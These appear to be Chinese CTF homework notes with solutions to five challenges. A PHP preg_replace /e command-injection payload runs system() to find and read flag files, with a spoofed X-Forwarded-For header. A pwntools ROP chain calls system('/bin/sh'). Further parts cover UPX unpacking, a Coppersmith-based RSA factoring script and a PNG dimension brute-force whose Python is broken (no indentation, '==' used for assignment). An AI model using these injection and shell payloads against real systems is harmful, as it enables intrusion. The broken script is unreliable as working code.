2.16作业
1
php://input 和 data://text/plain 协议执行 system("ls") 都失败
尝试读源代码php://filter/read=convert.base64-encode/resource=index.php
【pattern如果使用了/e 修正符, preg_replace() 会把 replacement 参数当作 PHP 代码执行】
preg_replace() 的 pat、rep、sub 三个变量:
bp抓包X-Forwarded-For:127.0.0.1
?pat=/test/e&rep=system("cd s3chahahaDir/flag;ls -la")&sub=test
?pat=/test/e&rep=system("cat s3chahahaDir/flag/flag.php")&sub=test
更好用的payload:index.php?pat=/test/e&rep=system("find / -name flag*")&sub=a
index.php?pat=/test/e&rep=system("cat /var/www/html/s3chahahaDir/flag/flag.php")&sub=a
2我把她弄丢了
组合system和/bin/sh(64位函数参数通过寄存器传递)
把/bin/sh字符串地址放到rdi里,再调用system函数
pop rdi /bin/sh ret
ELF文件:
# pwntools: parse the target binary and look up the PLT entry of system().
elf=ELF('./a')
shell=elf.plt['system']
# Overflow padding (0x70+8 bytes, presumably buffer plus saved rbp — confirm against the binary),
# then the chain described in the note above: pop rdi ; address of the "/bin/sh" string ; ret ; system.
# NOTE: `pop_rdi` (gadget address) and `r` (the extra ret) are not defined in this snippet.
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(0x402008)+p64(r)+p64(shell)
3UPX
upx脱不了壳,010查看(对比address in国家队)【UPX标志:大写UPX】
脱壳完又是base64但是换码表(跟期末考核一样的脚本跑就好)
(试了试cyberchef更好用)
4
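# Sage script (uses Sage-only syntax: `PR.<x> = ...` and `2^64`); run with `sage`, not `python`.
from sage.all_cmdline import *
from Crypto.Util.number import long_to_bytes
from gmpy2 import invert, iroot, gcd, mpz, powmod

# RSA public key and ciphertext from the challenge.
e = 65537
n = 79239019133008902130006198964639844798771408211660544649405418249108104979283858140199725213927656792578582828912684320882248828512464244641351915288069266378046829511827542801945752252863425605946379775869602719406340271702260307900825314967696531175183205977973427572862807386846990514994510850414958255877
c = 45457869965165575324534408050513326739799864850578881475341543330291990558135968254698676312246850389922318827771380881195754151389802803398367341521544667542828862543407738361578535730524976113729406101764290984943061582342991118766322793847422471903811686775249409300301726906738475446634950949059180072008
# Curve parameters and the y-coordinate of a point on y^2 = x^3 + a*x + b modulo a
# prime factor p of n. The x-coordinate is assumed small (bounded by X = 2^64 below),
# which is what makes the Coppersmith step work.
a = 9303981927028382051386918702900550228062240363697933771286553052631411452412621158116514735706670764224584958899184294505751247393129887316131576567242619
b = 9007779281398842447745292673398186664639261529076471011805234554666556577498532370235883716552696783469143334088312327338274844469338982242193952226631913
y = 970090448249525757357772770885678889252473675418473052487452323704761315577270362842929142427322075233537587085124672615901229826477368779145818623466854
# y**2 = x**3 + a * x + b
# Polynomial over Z/nZ whose root x satisfies f(x) ≡ 0 (mod p) for the unknown factor p.
PR.<x> = PolynomialRing(Zmod(n))
f = x ** 3 + a * x + b - y ** 2
f = f.monic()
# Coppersmith: small root (|x| < X) modulo a divisor p of n with p >= n^beta.
# small_roots() returns an empty list when no root is found, so guard the [0].
roots = f.small_roots(X=2^64, beta=0.4, epsilon=0.01)
if not roots:
    raise SystemExit("no small root found; adjust X/beta/epsilon")
pp = roots[0]
# 9757458594430450711  (presumably the root obtained for these challenge values)
x0 = mpz(pp)
# f(x0) is a multiple of p, so gcd with n recovers p — unless the root was spurious.
kp = x0 ** 3 + a * x0 + b - y ** 2
p = gcd(kp, mpz(n))
if not 1 < p < n:
    raise SystemExit("gcd did not yield a proper factor of n")
q = n // p
# Textbook RSA decryption once n is factored.
phi = (p - 1) * (q - 1)
d = invert(e, phi)
m = powmod(c, d, n)
flag = long_to_bytes(m)
print(flag)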
5
import zlib
import struct
with open(r"1.png",'rb') as image_data:
bin_data = image_data.read()
data = bytearray(bin_data[12:29])
cec32key = struct.unpack('>I',bin_data[29:33])[0]
n=4096#0x0fff
for w in range(n):
width = bytearray(struct.pack('>i',w))
for h in range(n):
height =bytearray(struct.pack('>i',h))
for x in range(4):
data[x+4]=width[x]
data[x+8]=height[x]
crc32result ==zlib.crc32(data)
if crc32result==crc32key:
print("高:%s 宽:%s"%(bytearray(width).hex(),bytearray(height).hex()))
exit()